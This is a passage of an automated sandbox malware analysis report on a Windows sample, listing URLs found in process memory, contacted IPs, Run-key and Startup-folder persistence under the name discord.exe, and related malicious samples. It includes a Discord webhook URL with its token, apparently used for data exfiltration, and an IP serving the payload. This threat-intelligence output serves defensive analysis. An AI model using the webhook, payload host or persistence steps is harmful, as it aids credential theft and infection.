          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameuBZeAVcb6r.exe, 00000000.00000002.527196154.000000000319D000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.000000000308E000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://policy.camerfirma.com0javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.jiyu-kobo.co.jp/d.uBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.certplus.com/CRL/class2.crljavaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://bugreport.sun.com/bugreport/javaw.exe, 00000001.00000002.530479660.000000000A5D5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009BD6000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://java.oracle.com/javaw.exe, 00000001.00000002.530479660.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009BE2000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://null.oracle.com/javaw.exe, 00000001.00000003.279457922.00000000160FA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.538948937.0000000016111000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.538711451.0000000015671000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.313426968.0000000015650000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.314148974.000000001565A000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.314291245.000000001566A000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.comicTFuBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://repository.swisssign.com/sjavaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://23.94.99.119/discord.exeu/Microsoft/Windows/StartuBZeAVcb6r.exe, 00000000.00000000.257397775.0000000000BE2000.00000002.00000001.01000000.00000003.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://cps.chambersign.org/cps/chambersroot.htmljavaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.jiyu-kobo.co.jp/Y0esruBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.carterandcone.comluBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.certplus.com/CRL/class3P.crljavaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/frere-jones.htmluBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://crl.securetrust.com/STCA.crljavaw.exe, 00000001.00000002.530479660.000000000A7ED000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/Y0$uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.xrampsecurity.com/XGCA.crl0javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.quovadis.bm0javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/_uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn$uBZeAVcb6r.exe, 00000000.00000003.271813495.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXuBZeAVcb6r.exe, 00000000.00000000.257397775.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp, uBZeAVcb6r.exe, 00000000.00000002.527196154.0000000003141000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.0000000003031000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000000.288794491.0000000000C42000.00000002.00000001.01000000.00000009.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designersGuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.313426968.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.314077068.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.538711451.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/bTheuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cnXuBZeAVcb6r.exe, 00000000.00000003.271813495.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271958382.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/jp/IuBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://cps.chambersign.org/cps/chambersroot.html0javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.tiro.comuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn=uBZeAVcb6r.exe, 00000000.00000003.271958382.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://policy.camerfirma.comjavaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.goodfont.co.kruBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.securetrust.com/STCA.crl0javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://canary.discord.comuBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.typography.netDuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.278202318.0000000006E1A000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.278480200.0000000006E1A000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.278715338.0000000006E1A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://cps.chambersign.org/cps/chambersroot.htmlKjavaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.quovadisglobal.com/cps0javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cnyuBZeAVcb6r.exe, 00000000.00000003.271813495.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comcomuBZeAVcb6r.exe, 00000000.00000003.277224524.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crljavaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.kruBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://ocsp.quovadisoffshore.com0javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://canary.discord.com4uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://repository.swisssign.com/javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.chambersign.orgjavaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnduBZeAVcb6r.exe, 00000000.00000003.271554107.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://23.94.99.119uBZeAVcb6r.exe, 00000000.00000002.527196154.000000000319D000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.000000000308E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.xrampsecurity.com/XGCA.crljavaw.exe, 00000001.00000002.530479660.000000000A7ED000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://canary.discord.comuBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.comionuBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/jp/ruBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/jp/uBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comduBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comldikuBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.quovadisglobal.com/cpsjavaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/cabarga.htmlNuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://23.94.99.119D8uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.founder.com.cn/cnuBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271438822.0000000006E37000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271495223.0000000006E3A000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271813495.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271539327.0000000006E3A000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271958382.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.273153920.0000000006E16000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://repository.swisssign.com/cCjavaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.comruBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.commuBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            162.159.137.232
                                            		canary.discord.comUnited States
                                            		13335CLOUDFLARENETUSfalse
                                            162.159.138.232
                                            		unknownUnited States
                                            		13335CLOUDFLARENETUSfalse
                                            23.94.99.119
                                            		unknownUnited States
                                            		36352AS-COLOCROSSINGUStrue

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                            Analysis ID:798176
                                            Start date and time:2023-02-03 20:34:10 +01:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 11m 37s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:20
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample file name:uBZeAVcb6r.exe
                                            Detection:MAL
                                            Classification:mal92.adwa.winEXE@15/4@4/4
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HDC Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 21
                                            • Number of non-executed functions: 4
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                            • Execution Graph export aborted for target javaw.exe, PID 6120 because there are no executed function
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            20:37:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe
                                            20:37:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Discord C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                            20:37:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Discord C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            162.159.137.232e-dekont-20230127.exeGet hashmaliciousBrowse
                                              E2C31090339C37FAF04CE2489EA35E9E22844B5AEF1A0.exeGet hashmaliciousBrowse
                                                KPCPU-231.exeGet hashmaliciousBrowse
                                                  e-dekont-20230120-.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Win32.TrojanX-gen.777.12023.exeGet hashmaliciousBrowse
                                                      XQDo1PTnRJ.exeGet hashmaliciousBrowse
                                                        beF3Ek6Ual.exeGet hashmaliciousBrowse
                                                          WA7urAQIa4.exeGet hashmaliciousBrowse
                                                            QVtJKhCR8L.exeGet hashmaliciousBrowse
                                                              f0pl993Jlv.exeGet hashmaliciousBrowse
                                                                AhbLc42WlU.exeGet hashmaliciousBrowse
                                                                  WanHI08oNK.exeGet hashmaliciousBrowse
                                                                    downloader.exeGet hashmaliciousBrowse
                                                                      Proforma DA request.jsGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Win64.RansomX-gen.7999.26557.exeGet hashmaliciousBrowse
                                                                          3rOyn65rNd.exeGet hashmaliciousBrowse
                                                                            7p3QH37WJT.exeGet hashmaliciousBrowse
                                                                              Order Requirements.xlsGet hashmaliciousBrowse
                                                                                Purchase Order_2241838_20221210_201349-pdf.com.exeGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Win32.Trojan-Stealer.Cordimik.0P9K5X.15421.10346.exeGet hashmaliciousBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    canary.discord.com12057ad2.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    build (2).exeGet hashmaliciousBrowse
                                                                                    • 162.159.136.232
                                                                                    Evo_Spoofer_V2.exeGet hashmaliciousBrowse
                                                                                    • 162.159.135.232
                                                                                    qgMcnt4meR.exeGet hashmaliciousBrowse
                                                                                    • 162.159.128.233
                                                                                    04A31AE8A31BB4144D7392040442F4A38E8301CC55012.exeGet hashmaliciousBrowse
                                                                                    • 162.159.136.232
                                                                                    vrG0FGHo9i.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    DsGo26G94d.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    E3yRg4ob8v.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    iBRa3vP0WB.exeGet hashmaliciousBrowse
                                                                                    • 162.159.137.232
                                                                                    6ZA1oFKiR8.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
                                                                                    duEkTVseyk.exeGet hashmaliciousBrowse
                                                                                    • 162.159.128.233
                                                                                    PMb1MdlBGB.exeGet hashmaliciousBrowse
                                                                                    • 162.159.128.233
                                                                                    5fmulGfQ2b.exeGet hashmaliciousBrowse
                                                                                    • 162.159.137.232
                                                                                    nUBTIa1WRr.exeGet hashmaliciousBrowse
                                                                                    • 162.159.137.232
                                                                                    Pw4sv8JMgF.exeGet hashmaliciousBrowse
                                                                                    • 162.159.135.232
                                                                                    4G6DrDxQk5.exeGet hashmaliciousBrowse
                                                                                    • 162.159.136.232
                                                                                    oilQDAuiBH.exeGet hashmaliciousBrowse
                                                                                    • 162.159.128.233
                                                                                    48aITmz4vp.exeGet hashmaliciousBrowse
                                                                                    • 162.159.137.232
                                                                                    kEtjx4XwPd.exeGet hashmaliciousBrowse
                                                                                    • 162.159.138.232
